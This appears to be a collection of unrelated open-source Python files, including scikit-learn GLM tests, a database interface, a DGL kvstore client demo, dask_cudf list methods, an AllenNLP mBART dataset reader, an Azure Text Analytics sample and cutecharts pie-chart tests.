@pytest.mark.parametrize("max_iter", ["not a number", 0, -1, 5.5, [1]])
def test_glm_max_iter_argument(max_iter):
"""Test GLM for invalid max_iter argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(max_iter=max_iter)
with pytest.raises(ValueError, match="must be a positive integer"):
glm.fit(X, y)
@pytest.mark.parametrize("tol", ["not a number", 0, -1.0, [1e-3]])
def test_glm_tol_argument(tol):
"""Test GLM for invalid tol argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(tol=tol)
with pytest.raises(ValueError, match="stopping criteria must be positive"):
glm.fit(X, y)
@pytest.mark.parametrize("warm_start", ["not bool", 1, 0, [True]])
def test_glm_warm_start_argument(warm_start):
"""Test GLM for invalid warm_start argument."""
y = np.array([1, 2])
X = np.array([[1], [1]])
glm = GeneralizedLinearRegressor(warm_start=warm_start)
with pytest.raises(ValueError, match="warm_start must be bool"):
glm.fit(X, y)
@pytest.mark.parametrize("fit_intercept", [False, True])
def test_glm_identity_regression(fit_intercept):
"""Test GLM regression with identity link on a simple dataset."""
coef = [1.0, 2.0]
X = np.array([[1, 1, 1, 1, 1], [0, 1, 2, 3, 4]]).T
y = np.dot(X, coef)
glm = GeneralizedLinearRegressor(
alpha=0,
family="normal",
link="identity",
fit_intercept=fit_intercept,
tol=1e-12,
)
if fit_intercept:
glm.fit(X[:, 1:], y)
assert_allclose(glm.coef_, coef[1:], rtol=1e-10)
assert_allclose(glm.intercept_, coef[0], rtol=1e-10)
else:
glm.fit(X, y)
assert_allclose(glm.coef_, coef, rtol=1e-12)
@pytest.mark.parametrize("fit_intercept", [False, True])
@pytest.mark.parametrize("alpha", [0.0, 1.0])
@pytest.mark.parametrize("family", ["normal", "poisson", "gamma"])
def test_glm_sample_weight_consistency(fit_intercept, alpha, family):
"""Test that the impact of sample_weight is consistent"""
rng = np.random.RandomState(0)
n_samples, n_features = 10, 5
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
glm_params = dict(
alpha=alpha, family=family, link="auto", fit_intercept=fit_intercept
)
glm = GeneralizedLinearRegressor(**glm_params).fit(X, y)
coef = glm.coef_.copy()
# sample_weight=np.ones(..) should be equivalent to sample_weight=None
sample_weight = np.ones(y.shape)
glm.fit(X, y, sample_weight=sample_weight)
assert_allclose(glm.coef_, coef, rtol=1e-12)
# sample_weight is normalized to 1, so scaling it has no effect
sample_weight = 2 * np.ones(y.shape)
glm.fit(X, y, sample_weight=sample_weight)
assert_allclose(glm.coef_, coef, rtol=1e-12)
# setting one element of sample_weight to 0 is equivalent to removing
# the corresponding sample
sample_weight = np.ones(y.shape)
sample_weight[-1] = 0
glm.fit(X, y, sample_weight=sample_weight)
coef1 = glm.coef_.copy()
glm.fit(X[:-1], y[:-1])
assert_allclose(glm.coef_, coef1, rtol=1e-12)
# check that multiplying sample_weight by 2 is equivalent
# to repeating corresponding samples twice
X2 = np.concatenate([X, X[: n_samples // 2]], axis=0)
y2 = np.concatenate([y, y[: n_samples // 2]])
sample_weight_1 = np.ones(len(y))
sample_weight_1[: n_samples // 2] = 2
glm1 = GeneralizedLinearRegressor(**glm_params).fit(
X, y, sample_weight=sample_weight_1
)
glm2 = GeneralizedLinearRegressor(**glm_params).fit(X2, y2, sample_weight=None)
assert_allclose(glm1.coef_, glm2.coef_)
@pytest.mark.parametrize("fit_intercept", [True, False])
@pytest.mark.parametrize(
"family",
[
NormalDistribution(),
PoissonDistribution(),
GammaDistribution(),
InverseGaussianDistribution(),
TweedieDistribution(power=1.5),
TweedieDistribution(power=4.5),
],
)
def test_glm_log_regression(fit_intercept, family):
"""Test GLM regression with log link on a simple dataset."""
coef = [0.2, -0.1]
X = np.array([[1, 1, 1, 1, 1], [0, 1, 2, 3, 4]]).T
y = np.exp(np.dot(X, coef))
glm = GeneralizedLinearRegressor(
alpha=0, family=family, link="log", fit_intercept=fit_intercept, tol=1e-7
)
if fit_intercept:
res = glm.fit(X[:, 1:], y)
assert_allclose(res.coef_, coef[1:], rtol=1e-6)
assert_allclose(res.intercept_, coef[0], rtol=1e-6)
else:
res = glm.fit(X, y)
assert_allclose(res.coef_, coef, rtol=2e-6)
@pytest.mark.parametrize("fit_intercept", [True, False])
def test_warm_start(fit_intercept):
n_samples, n_features = 110, 10
X, y = make_regression(
n_samples=n_samples,
n_features=n_features,
n_informative=n_features - 2,
noise=0.5,
random_state=42,
)
glm1 = GeneralizedLinearRegressor(
warm_start=False, fit_intercept=fit_intercept, max_iter=1000
)
glm1.fit(X, y)
glm2 = GeneralizedLinearRegressor(
warm_start=True, fit_intercept=fit_intercept, max_iter=1
)
# As we intentionally set max_iter=1, L-BFGS-B will issue a
# ConvergenceWarning which we here simply ignore.
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=ConvergenceWarning)
glm2.fit(X, y)
assert glm1.score(X, y) > glm2.score(X, y)
glm2.set_params(max_iter=1000)
glm2.fit(X, y)
# The two models are not exactly identical since the lbfgs solver
# computes the approximate hessian from previous iterations, which
# will not be strictly identical in the case of a warm start.
assert_allclose(glm1.coef_, glm2.coef_, rtol=1e-5)
assert_allclose(glm1.score(X, y), glm2.score(X, y), rtol=1e-4)
# FIXME: 'normalize' to be removed in 1.2 in LinearRegression
@pytest.mark.filterwarnings("ignore:'normalize' was deprecated")
@pytest.mark.parametrize("n_samples, n_features", [(100, 10), (10, 100)])
@pytest.mark.parametrize("fit_intercept", [True, False])
@pytest.mark.parametrize("sample_weight", [None, True])
def test_normal_ridge_comparison(
n_samples, n_features, fit_intercept, sample_weight, request
):
"""Compare with Ridge regression for Normal distributions."""
test_size = 10
X, y = make_regression(
n_samples=n_samples + test_size,
n_features=n_features,
n_informative=n_features - 2,
noise=0.5,
random_state=42,
)
if n_samples > n_features:
ridge_params = {"solver": "svd"}
else:
ridge_params = {"solver": "saga", "max_iter": 1000000, "tol": 1e-7}
(
X_train,
X_test,
y_train,
y_test,
) = train_test_split(X, y, test_size=test_size, random_state=0)
alpha = 1.0
if sample_weight is None:
sw_train = None
alpha_ridge = alpha * n_samples
else:
sw_train = np.random.RandomState(0).rand(len(y_train))
alpha_ridge = alpha * sw_train.sum()
# GLM has 1/(2*n) * Loss + 1/2*L2, Ridge has Loss + L2
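# Concretely (a restatement of the scaling above, not new behaviour): the GLM
# objective is 1/(2*sum(w)) * sum(w_i * (y_i - x_i @ coef)**2) + alpha/2 * ||coef||**2,
# while Ridge minimizes sum(w_i * (y_i - x_i @ coef)**2) + alpha_ridge * ||coef||**2;
# multiplying the GLM objective by 2*sum(w) shows the two coincide when
# alpha_ridge = alpha * sum(w) (= alpha * n_samples for unit weights), which is
# exactly the value used here.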
ridge = Ridge(
alpha=alpha_ridge,
normalize=False,
random_state=42,
fit_intercept=fit_intercept,
**ridge_params,
)
ridge.fit(X_train, y_train, sample_weight=sw_train)
glm = GeneralizedLinearRegressor(
alpha=alpha,
family="normal",
link="identity",
fit_intercept=fit_intercept,
max_iter=300,
tol=1e-5,
)
glm.fit(X_train, y_train, sample_weight=sw_train)
assert glm.coef_.shape == (X.shape[1],)
assert_allclose(glm.coef_, ridge.coef_, atol=5e-5)
assert_allclose(glm.intercept_, ridge.intercept_, rtol=1e-5)
assert_allclose(glm.predict(X_train), ridge.predict(X_train), rtol=2e-4)
assert_allclose(glm.predict(X_test), ridge.predict(X_test), rtol=2e-4)
def test_poisson_glmnet():
"""Compare Poisson regression with L2 regularization and LogLink to glmnet"""
# library("glmnet")
# options(digits=10)
# df <- data.frame(a=c(-2,-1,1,2), b=c(0,0,1,1), y=c(0,1,1,2))
# x <- data.matrix(df[,c("a", "b")])
# y <- df$y
# fit <- glmnet(x=x, y=y, alpha=0, intercept=T, family="poisson",
# standardize=F, thresh=1e-10, nlambda=10000)
# coef(fit, s=1)
# (Intercept) -0.12889386979
# a 0.29019207995
# b 0.03741173122
X = np.array([[-2, -1, 1, 2], [0, 0, 1, 1]]).T
y = np.array([0, 1, 1, 2])
glm = GeneralizedLinearRegressor(
alpha=1,
fit_intercept=True,
family="poisson",
link="log",
tol=1e-7,
max_iter=300,
)
glm.fit(X, y)
assert_allclose(glm.intercept_, -0.12889386979, rtol=1e-5)
assert_allclose(glm.coef_, [0.29019207995, 0.03741173122], rtol=1e-5)
def test_convergence_warning(regression_data):
X, y = regression_data
est = GeneralizedLinearRegressor(max_iter=1, tol=1e-20)
with pytest.warns(ConvergenceWarning):
est.fit(X, y)
def test_poisson_regression_family(regression_data):
# Make sure the family attribute is read-only to prevent searching over it
# e.g. in a grid search
est = PoissonRegressor()
est.family == "poisson"
msg = "PoissonRegressor.family must be 'poisson'!"
with pytest.raises(ValueError, match=msg):
est.family = 0
def test_gamma_regression_family(regression_data):
# Make sure the family attribute is read-only to prevent searching over it
# e.g. in a grid search
est = GammaRegressor()
est.family == "gamma"
msg = "GammaRegressor.family must be 'gamma'!"
with pytest.raises(ValueError, match=msg):
est.family = 0
def test_tweedie_regression_family(regression_data):
# Make sure the family attribute is always a TweedieDistribution and that
# the power attribute is properly updated
power = 2.0
est = TweedieRegressor(power=power)
assert isinstance(est.family, TweedieDistribution)
assert est.family.power == power
assert est.power == power
new_power = 0
new_family = TweedieDistribution(power=new_power)
est.family = new_family
assert isinstance(est.family, TweedieDistribution)
assert est.family.power == new_power
assert est.power == new_power
msg = "TweedieRegressor.family must be of type TweedieDistribution!"
with pytest.raises(TypeError, match=msg):
est.family = None
@pytest.mark.parametrize(
"estimator, value",
[
(PoissonRegressor(), True),
(GammaRegressor(), True),
(TweedieRegressor(power=1.5), True),
(TweedieRegressor(power=0), False),
],
)
def test_tags(estimator, value):
assert estimator._get_tags()["requires_positive_y"] is value
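# A sketch of how this test module can be run on its own; the path follows
# scikit-learn's usual layout and is an assumption, not taken from this file:
#   pytest sklearn/linear_model/_glm/tests/test_glm.py -q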
|
the-stack_106_22184
|
from abc import ABC, abstractmethod
from typing import Dict, List, Tuple
from enum import Enum
from nxs_types import DataModel
class NxsDbType(str, Enum):
MONGODB = "mongodb"
REDIS = "redis"
class NxsDbSortType(int, Enum):
DESCENDING = -1
ASCENDING = 1
class NxsDbQueryConfig(DataModel):
projection_list: List[str] = []
sort_list: List[Tuple[str, NxsDbSortType]] = []
skip: int = 0
limit: int = None
class NxsDbExceptionMissingShardKey(Exception):
pass
class NxsDbInvalidDbType(Exception):
pass
class NxsDb(ABC):
def __init__(self) -> None:
super().__init__()
@abstractmethod
def query(
self,
collection_name: str,
query: Dict,
query_config: NxsDbQueryConfig = NxsDbQueryConfig(),
extra_params: Dict = {},
) -> List:
raise NotImplementedError
@abstractmethod
def insert(self, collection_name: str, data: Dict, extra_params: Dict = {}) -> None:
raise NotImplementedError
@abstractmethod
def update(
self,
collection_name: str,
query: Dict,
new_data: Dict,
insert_if_not_existed: bool = False,
extra_params: Dict = {},
) -> None:
raise NotImplementedError
@abstractmethod
def delete(
self, collection_name: str, query: Dict, extra_params: Dict = {}
) -> None:
raise NotImplementedError
@abstractmethod
def close(self) -> None:
raise NotImplementedError
class NxsDbFactory:
@staticmethod
def create_db(type: NxsDbType, **kwargs) -> NxsDb:
if type == NxsDbType.MONGODB:
from nxs_libs.db.nxs_mongodb import NxsMongoDb
return NxsMongoDb(**kwargs)
elif type == NxsDbType.REDIS:
from nxs_libs.db.nxs_redis import NxsSimpleRedisDB
return NxsSimpleRedisDB(**kwargs)
raise NxsDbInvalidDbType
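# Minimal usage sketch. The keyword arguments below (e.g. `uri`) are hypothetical;
# the concrete backends define whatever constructor arguments they actually accept.
#   db = NxsDbFactory.create_db(NxsDbType.MONGODB, uri="mongodb://localhost:27017")
#   rows = db.query(
#       "models",
#       {"owner": "alice"},
#       NxsDbQueryConfig(sort_list=[("ts", NxsDbSortType.DESCENDING)], limit=10),
#   )
#   db.close()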
|
the-stack_106_22186
|
from ..scripts.test_script_ver_4 import *
from ..scripts.hist_eq import hist_eq
def driver_he():
# making preprocessing_name string
preprocessing_name = "HE"
# method as function name
method = hist_eq
# making initial list
parameters_list = ['', method, []]
parameters_string = 'histogram_eq'
parameters_list[0] = parameters_string
parameters_list[2] = []
analysis(preprocessing_name, parameters_list)
# def
if __name__ == "__main__":
driver_he()
|
the-stack_106_22187
|
# This is a simple MXNet client demo that shows how to use the DGL distributed kvstore.
import dgl
import argparse
import mxnet as mx
import time
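# The client below expects an `ip_config.txt` in the working directory. A plausible
# single-machine layout is one "<ip> <port> <server_count>" line per server, e.g.
#   127.0.0.1 30050 1
# The exact format depends on the DGL version, so treat this line as an assumption.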
ID = []
ID.append(mx.nd.array([0,1], dtype='int64'))
ID.append(mx.nd.array([2,3], dtype='int64'))
ID.append(mx.nd.array([4,5], dtype='int64'))
ID.append(mx.nd.array([6,7], dtype='int64'))
DATA = []
DATA.append(mx.nd.array([[1.,1.,1.,],[1.,1.,1.,]]))
DATA.append(mx.nd.array([[2.,2.,2.,],[2.,2.,2.,]]))
DATA.append(mx.nd.array([[3.,3.,3.,],[3.,3.,3.,]]))
DATA.append(mx.nd.array([[4.,4.,4.,],[4.,4.,4.,]]))
edata_partition_book = {'edata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
ndata_partition_book = {'ndata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
def start_client():
time.sleep(3)
client = dgl.contrib.start_client(ip_config='ip_config.txt',
ndata_partition_book=ndata_partition_book,
edata_partition_book=edata_partition_book,
close_shared_mem=True)
tensor_edata = client.pull(name='edata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
tensor_ndata = client.pull(name='ndata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
print(tensor_edata)
client.barrier()
print(tensor_ndata)
client.barrier()
client.push(name='edata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.push(name='ndata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.barrier()
tensor_edata = client.pull(name='edata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
tensor_ndata = client.pull(name='ndata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
print(tensor_edata)
client.barrier()
print(tensor_ndata)
client.barrier()
if client.get_id() == 0:
client.shut_down()
if __name__ == '__main__':
start_client()
|
the-stack_106_22188
|
# Copyright (c) 2021, NVIDIA CORPORATION.
class ListMethods:
def __init__(self, d_series):
self.d_series = d_series
def len(self):
"""
Computes the length of each element in the Series/Index.
Returns
-------
Series or Index
Examples
--------
>>> s = cudf.Series([[1, 2, 3], None, [4, 5]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds
0 [1, 2, 3]
1 None
2 [4, 5]
dtype: list
>>> ds.list.len().compute()
0 3
1 <NA>
2 2
dtype: int32
"""
return self.d_series.map_partitions(
lambda s: s.list.len(), meta=self.d_series._meta
)
def contains(self, search_key):
"""
Creates a column of bool values indicating whether the specified scalar
is an element of each row of a list column.
Parameters
----------
search_key : scalar
element being searched for in each row of the list column
Returns
-------
Column
Examples
--------
>>> s = cudf.Series([[1, 2, 3], [3, 4, 5], [4, 5, 6]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.contains(4).compute()
Series([False, True, True])
dtype: bool
"""
return self.d_series.map_partitions(
lambda s: s.list.contains(search_key), meta=self.d_series._meta
)
def get(self, index):
"""
Extract element at the given index from each component
Extract element from lists, tuples, or strings in
each element in the Series/Index.
Parameters
----------
index : int
Returns
-------
Series or Index
Examples
--------
>>> s = cudf.Series([[1, 2, 3], [3, 4, 5], [4, 5, 6]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.get(-1).compute()
0 3
1 5
2 6
dtype: int64
"""
return self.d_series.map_partitions(
lambda s: s.list.get(index), meta=self.d_series._meta
)
@property
def leaves(self):
"""
From a Series of (possibly nested) lists, obtain the elements from
the innermost lists as a flat Series (one value per row).
Returns
-------
Series
Examples
--------
>>> s = cudf.Series([[[1, None], [3, 4]], None, [[5, 6]]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.leaves.compute()
0 1
1 <NA>
2 3
3 4
4 5
5 6
dtype: int64
"""
return self.d_series.map_partitions(
lambda s: s.list.leaves, meta=self.d_series._meta
)
def take(self, lists_indices):
"""
Collect list elements based on given indices.
Parameters
----------
lists_indices: List type arrays
Specifies what to collect from each row
Returns
-------
ListColumn
Examples
--------
>>> s = cudf.Series([[1, 2, 3], None, [4, 5]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds
0 [1, 2, 3]
1 None
2 [4, 5]
dtype: list
>>> ds.list.take([[0, 1], [], []]).compute()
0 [1, 2]
1 None
2 []
dtype: list
"""
return self.d_series.map_partitions(
lambda s: s.list.take(lists_indices), meta=self.d_series._meta
)
def unique(self):
"""
Returns unique element for each list in the column, order for each
unique element is not guaranteed.
Returns
-------
ListColumn
Examples
--------
>>> s = cudf.Series([[1, 1, 2, None, None], None, [4, 4], []])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds
0 [1.0, 1.0, 2.0, nan, nan]
1 None
2 [4.0, 4.0]
3 []
dtype: list
>>> ds.list.unique().compute() # Order of elements not guaranteed
0 [1.0, 2.0, nan]
1 None
2 [4.0]
3 []
dtype: list
"""
return self.d_series.map_partitions(
lambda s: s.list.unique(), meta=self.d_series._meta
)
def sort_values(
self,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
ignore_index=False,
):
"""
Sort each list by the values.
Sort the lists in ascending or descending order by some criterion.
Parameters
----------
ascending : bool, default True
If True, sort values in ascending order, otherwise descending.
na_position : {'first', 'last'}, default 'last'
'first' puts nulls at the beginning, 'last' puts nulls at the end.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, ..., n - 1.
Returns
-------
ListColumn with each list sorted
Notes
-----
Difference from pandas:
* Not supporting: `inplace`, `kind`
Examples
--------
>>> s = cudf.Series([[4, 2, None, 9], [8, 8, 2], [2, 1]])
>>> ds = dask_cudf.from_cudf(s, 2)
>>> ds.list.sort_values(ascending=True, na_position="last").compute()
0 [2.0, 4.0, 9.0, nan]
1 [2.0, 8.0, 8.0]
2 [1.0, 2.0]
dtype: list
"""
return self.d_series.map_partitions(
lambda s: s.list.sort_values(
ascending, inplace, kind, na_position, ignore_index
),
meta=self.d_series._meta,
)
|
the-stack_106_22189
|
import csv
from typing import Dict, List, Optional
import logging
import copy
from random import randint, sample
from overrides import overrides
from allennlp.common.checks import ConfigurationError
from allennlp.common.file_utils import cached_path
from allennlp.common.util import START_SYMBOL, END_SYMBOL
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data import Token
from allennlp.data.fields import TextField, TensorField
from allennlp.data.instance import Instance
from allennlp.data.tokenizers import PretrainedTransformerTokenizer
from allennlp.data.token_indexers import TokenIndexer, PretrainedTransformerIndexer, SingleIdTokenIndexer
from zxp.dataset_readers.seq2seq_pretrain_paired \
import MBARTTokenizerWrapper, LANG2IDX, DEFAULT_LANGIDX, VALID_MBART50_MODELS, VALID_MBART_MODELS, LanguageFormatter
logger = logging.getLogger(__name__)
MASK_SYMBOL = "<mask>"
@DatasetReader.register("seq2seq_pretrain_unpaired")
class PretrainedTransformerSeq2SeqUnpairedDatasetReader(DatasetReader):
"""
Unifies the seq2seq dataset parsers for standard Huggingface embedders (BART, XLM-Roberta, etc)
with the embedder for mBART-50 which requires a different interface due to locale switching.
Assume NL-LOCALE pairs. The target_string is a copy of source that is independently indexed for the NL-decoder.
Compose Instances of "source_tokens", "source_lang" and optionally "target_tokens".
- "source_tokens" should be NL
- "source_lang" should be an ISO code (or converted to one)
- "target_tokens" will be NL.
Expected format for each input line: <source_sequence_string>\t<source_lang>
If we lack <source_lang> then we assume this is "en_XX".
The output of `read` is a list of `Instance` s with the fields:
source_tokens : `TextField` and
target_tokens : `Optional[TextField]` and
source_lang : `TextField`
"""
def __init__(
self,
source_pretrained_model_name: str = None,
source_token_namespace: str = "tokens",
use_mbart_indexer: bool = True,
target_token_indexers: Dict[str, TokenIndexer] = None,
delimiter: str = "\t",
source_max_tokens: Optional[int] = 1024,
quoting: int = csv.QUOTE_MINIMAL,
num_tokens_to_mask: int = 0,
**kwargs,
) -> None:
super().__init__(**kwargs)
self._mbart50_tokenizer = False
self._mbart_tokenizer = False
if source_pretrained_model_name in VALID_MBART50_MODELS:
logger.info(f"Creating mBART-50 based tokenizer for {source_pretrained_model_name}")
self._source_tokenizer = MBARTTokenizerWrapper(source_pretrained_model_name, source_max_tokens)
self._mbart50_tokenizer = True
else:
logger.info(f"Creating generic HuggingFace tokenizer for {source_pretrained_model_name}")
# Tokenization works best if we use the AllenNLP implementation. For mbart-large-cc25 we need
# to manually switch the source lang before each tokenizer call.
if source_pretrained_model_name in VALID_MBART_MODELS:
self._mbart_tokenizer = True
self._source_tokenizer = PretrainedTransformerTokenizer(
model_name=source_pretrained_model_name, add_special_tokens=True)
if use_mbart_indexer:
self._source_token_indexers = {
source_token_namespace: PretrainedTransformerIndexer(model_name=source_pretrained_model_name,
namespace=source_token_namespace
)
}
else:
self._source_token_indexers = {
source_token_namespace: SingleIdTokenIndexer(namespace=source_token_namespace)
}
# Language code validator
self._validator = LanguageFormatter(self._source_tokenizer.tokenizer.additional_special_tokens)
# There is a conflict here because we want to follow the source tokenization but DecoderNet instances
# rigidly expect the START_SYMBOL, END_SYMBOL bookends. We try the HF approach with `add_special_tokens=False`
if source_pretrained_model_name in VALID_MBART50_MODELS:
logger.info(f"Creating mBART-50 based tokenizer for {source_pretrained_model_name}")
self._target_tokenizer = MBARTTokenizerWrapper(source_pretrained_model_name, source_max_tokens)
else:
logger.info(f"Creating generic HuggingFace tokenizer for {source_pretrained_model_name}")
self._target_tokenizer = PretrainedTransformerTokenizer(
model_name=source_pretrained_model_name, add_special_tokens=False)
logger.info(f"Expectation of sentence locale pairs without target sequence. tgt_tokenizer follows source.")
# Target indexing should probably not match source as we aren't copying the embedder.
self._target_token_indexers = target_token_indexers
# DecoderNet instances expect these specific symbols.
self._start_token = Token(START_SYMBOL)
self._end_token = Token(END_SYMBOL)
# Locate mask token
self._num_tokens_to_mask = num_tokens_to_mask
mask_seq = self._source_tokenizer.tokenize(MASK_SYMBOL)
mask_seq_ = [t for t in mask_seq if t.text == MASK_SYMBOL]
if mask_seq_:
self._mask_token = mask_seq_[0]
else:
raise ValueError(f"Cannot locate mask token inside source tokenizer. Search over {mask_seq}.")
# Start and end token logic
self._target_add_start_token = True
self._target_add_end_token = True
logger.info(f"Target tokenizer BOS: \"{self._start_token}\" and EOS: \"{self._end_token}\"")
# TSV delimiter
self._delimiter = delimiter
self._source_max_tokens = source_max_tokens
self._target_max_tokens = source_max_tokens
self._source_max_exceeded = 0
self._target_max_exceeded = 0
self.quoting = quoting
@overrides
def _read(self, file_path: str):
# Reset exceeded counts
self._source_max_exceeded = 0
self._target_max_exceeded = 0
# Open data file
with open(cached_path(file_path), "r") as data_file:
logger.info("Reading instances from lines in file at: %s", file_path)
# Enumerate rows in data file
for line_num, row in enumerate(
csv.reader(data_file, delimiter=self._delimiter, quoting=self.quoting)
):
# First case is the NL\tLOCALE case
if len(row) == 2:
source_sequence, source_lang = row
target_sequence = source_sequence
else:
raise ConfigurationError(
"Invalid line format: %s (line number %d)" % (row, line_num + 1)
)
yield self.text_to_instance(source_sequence, target_sequence, source_lang)
if self._source_max_tokens and self._source_max_exceeded:
logger.info(
"In %d instances, the source token length exceeded the max limit (%d) and were truncated.",
self._source_max_exceeded,
self._source_max_tokens,
)
if self._target_max_tokens and self._target_max_exceeded:
logger.info(
"In %d instances, the target token length exceeded the max limit (%d) and were truncated.",
self._target_max_exceeded,
self._target_max_tokens,
)
@overrides
def text_to_instance(
self, source_string: str, target_string: str = None, source_lang: str = None
) -> Instance: # type: ignore
source_lang = self._validator(source_lang)
tokenizer_args = (source_string, source_lang) if self._mbart50_tokenizer else (source_string, )
if self._mbart_tokenizer:
self._source_tokenizer.tokenizer.src_lang = source_lang
tokenized_source = self._source_tokenizer.tokenize(*tokenizer_args)
if self._source_max_tokens and len(tokenized_source) > self._source_max_tokens:
self._source_max_exceeded += 1
tokenized_source = tokenized_source[: self._source_max_tokens]
# Replace between `0` and `num_symbols_to_mask` symbols with the <mask> token
if self._num_tokens_to_mask:
# We check that we aren't masking the full sequence. If we are trying to mask more tokens
# than available then we set a maximum of half the sequence
max_num_tokens_to_mask = self._num_tokens_to_mask if \
len(tokenized_source) > self._num_tokens_to_mask else int(len(tokenized_source) / 2)
num_mask = randint(0, max_num_tokens_to_mask) # Replace between 0 and _num_token_to_mask tokens
idx_to_mask = sample(range(len(tokenized_source)), num_mask)
for idx in idx_to_mask:
tokenized_source[idx] = self._mask_token
source_field = TextField(tokenized_source, self._source_token_indexers)
source_lang_iso = self._validator(source_lang)
lang_field = TensorField(LANG2IDX.get(source_lang_iso, DEFAULT_LANGIDX))
# Passing in target_string as a copy of the source is not redundant as we need different BOS/EOS behaviour
if target_string is not None:
tokenizer_args = (target_string, source_lang, False) if self._mbart50_tokenizer else (target_string,)
tokenized_target = self._target_tokenizer.tokenize(*tokenizer_args)
if self._target_max_tokens and len(tokenized_target) > self._target_max_tokens:
self._target_max_exceeded += 1
tokenized_target = tokenized_target[: self._target_max_tokens]
if self._target_add_start_token:
tokenized_target.insert(0, copy.deepcopy(self._start_token))
if self._target_add_end_token:
tokenized_target.append(copy.deepcopy(self._end_token))
target_field = TextField(tokenized_target, self._target_token_indexers)
return Instance({"source_tokens": source_field, "target_tokens": target_field, "source_lang": lang_field})
else:
return Instance({"source_tokens": source_field, "source_lang": lang_field})
|
the-stack_106_22190
|
# Author: Parashar Shah
# Chapter: Cognitive Services
# Version: 1.0
# Date: May 25, 2018
# Replace <Access Key> with your valid subscription's API access key.
subscription_key = "<Access Key>"
assert subscription_key
# Replace the base URL with what you see as Endpoint in the portal's Overview section under your API
text_analytics_base_url = "https://westus2.api.cognitive.microsoft.com/text/analytics/v2.0/"
sentiment_api_url = text_analytics_base_url + "sentiment"
# Send the text you want the api to analyze
# You can send multiple texts
documents = {'documents' : [
{'id': '1', 'text': 'I am excited about using AI offerings by Microsoft.'},
]}
import requests
# Get sentiment of text
headers = {"Ocp-Apim-Subscription-Key": subscription_key}
response = requests.post(sentiment_api_url, headers=headers, json=documents)
sentiments = response.json()
print(sentiments)
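# For this (since-retired) v2.0 endpoint, a successful call returned JSON roughly of
# the form {"documents": [{"id": "1", "score": 0.97}], "errors": []}; the shape is
# recalled from memory, so verify it against the current service documentation.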
# Get the language of text
language_api_url = text_analytics_base_url + "languages"
response = requests.post(language_api_url, headers=headers, json=documents)
languages = response.json()
print(languages)
# Get key phrases from text
key_phrase_api_url = text_analytics_base_url + "keyPhrases"
response = requests.post(key_phrase_api_url, headers=headers, json=documents)
key_phrases = response.json()
print(key_phrases)
# Get well-known entities
entity_linking_api_url = text_analytics_base_url + "entities"
response = requests.post(entity_linking_api_url, headers=headers, json=documents)
entities = response.json()
print(entities)
|
the-stack_106_22191
|
from nose.tools import assert_equal
from cutecharts.charts import Pie
from cutecharts.render.engine import remove_key_with_none_value
def gen_pie_base() -> Pie:
c = Pie("Pie")
c.set_options(labels=["A", "B"])
c.add_series(["1", "2"])
return c
def test_pie_opts_before():
c = gen_pie_base()
expected = {
"title": "Pie",
"data": {"datasets": [{"data": ["1", "2"]}], "labels": ["A", "B"]},
"options": {
"dataColors": None,
"fontFamily": None,
"innerRadius": 0.5,
"legendPosition": 1,
},
}
assert_equal(c.opts, expected)
def test_pie_opts_after():
c = gen_pie_base()
c.opts = remove_key_with_none_value(c.opts)
expected = {
"title": "Pie",
"data": {"datasets": [{"data": ["1", "2"]}], "labels": ["A", "B"]},
"options": {"innerRadius": 0.5, "legendPosition": 1},
}
assert_equal(c.opts, expected)
|